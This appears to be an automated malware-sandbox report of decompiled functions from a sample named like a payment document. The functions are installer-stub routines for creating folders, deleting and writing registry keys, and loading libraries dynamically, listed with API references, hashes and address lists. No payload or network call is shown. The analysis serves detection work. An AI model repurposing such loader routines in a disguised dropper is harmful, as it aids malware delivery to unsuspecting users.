String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59

Uniqueness

Uniqueness Score: -1.00%

Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004054b4
0x004054b8
0x004054bb
0x004054c1
0x004054c5
0x004054c9
0x004054d1
0x004054d8
0x004054de
0x004054e5
0x004054f4
0x004054f6
0x00000000
0x004054f6
0x00405500
0x00405507
0x0040551d
0x00000000
0x00000000
0x00000000
0x0040551f
0x00405523

APIs

CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
GetLastError.KERNEL32 ref: 00405500
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
GetLastError.KERNEL32 ref: 0040551F

Strings

C:\Users\user\Desktop, xrefs: 004054A9

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3125694417
Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}

0x00402a6d
0x00402a75
0x00402a9d
0x00402a87
0x00402ad7
0x00402add
0x00000000
0x00402adf
0x00402a9b
0x00000000
0x00000000
0x00402a9b
0x00402ab2
0x00402aba
0x00402ac1
0x00402aed
0x00000000
0x00000000
0x00402af5
0x00402afd
0x00000000
0x00000000
0x00000000
0x00402afd
0x00000000
0x00402ad0
0x00402ae4

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
RegCloseKey.ADVAPI32(?), ref: 00402AB2
RegCloseKey.ADVAPI32(?), ref: 00402AD7
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x004028a4
0x004028b0

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79

Uniqueness

Uniqueness Score: -1.00%

Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x0040588b
0x0040588b
0x00405892
0x00405895
0x0040589a
0x004058ad
0x004058c7
0x00000000
0x004058c7
0x004058b1
0x004058b2
0x004058b5
0x004058b6
0x004058be
0x00000000
0x00000000
0x004058c0
0x004058c3
0x00000000
0x00000000
0x00000000
0x004058c3
0x00000000
0x004058a3
0x00000000
0x004058a4

APIs

CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405890
CharNextA.USER32(00000000), ref: 00405895
CharNextA.USER32(00000000), ref: 004058A4

Strings

C:\, xrefs: 00405883
4V@, xrefs: 0040588B, 0040588F

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharNext
String ID: 4V@$C:\
API String ID: 3213498283-1503405514
Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA

Uniqueness

Uniqueness Score: -1.00%

Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}

0x004047b2
0x004047b7
0x004047bf
0x004047c0
0x004047cd
0x004047d5
0x004047d6
0x004047d8
0x004047da
0x004047dc
0x004047df
0x004047df
0x004047e6
0x004047ec
0x004047ec
0x004047f3
0x004047fa
0x004047fd
0x00404800
0x00404800
0x00404804
0x00404814
0x00404816
0x00404819
0x004047c2
0x004047c2
0x004047c9
0x004047c9
0x00404821
0x0040482c
0x00404842
0x00404852
0x0040486e

APIs

lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
wsprintfA.USER32 ref: 00404852
SetDlgItemTextA.USER32 ref: 00404865

Strings

%u.%u%s%s, xrefs: 00404834

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402849
0x00402849
0x004028a4
0x004028b0

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004057ef
0x00405806
0x0040580e
0x0040580e
0x00405816

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
lstrcatA.KERNEL32(?,00409010), ref: 0040580E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f67
0x00401f67
0x00401f6c
0x00401f73
0x0040202f
0x0040217a
0x0040217a
0x004028a1
0x004028a4
0x004028b0
0x004028b0
0x00401f82
0x00401f8c
0x00401f8f
0x00401f9e
0x00401fa8
0x00401fac
0x00402028
0x00000000
0x00402028
0x00401fae
0x00401fb8
0x00401fbc
0x00402000
0x00401fbe
0x00401fc1
0x00401fc4
0x00401ff4
0x00401fc6
0x00401fc9
0x00401fd2
0x00401fd4
0x00401fd4
0x00401fd2
0x00401fc4
0x00402008
0x0040201d
0x0040201d
0x00000000
0x00402008
0x00401f98
0x00401f9c
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}

0x0040231a
0x0040231f
0x00402329
0x00402333
0x00402336
0x00402346
0x00402350
0x00402357
0x0040235f
0x0040236d
0x00402371
0x0040237c
0x0040237c
0x00402380
0x00402384
0x0040238a
0x0040238f
0x0040238f
0x00402393
0x0040239f
0x0040239f
0x004023b8
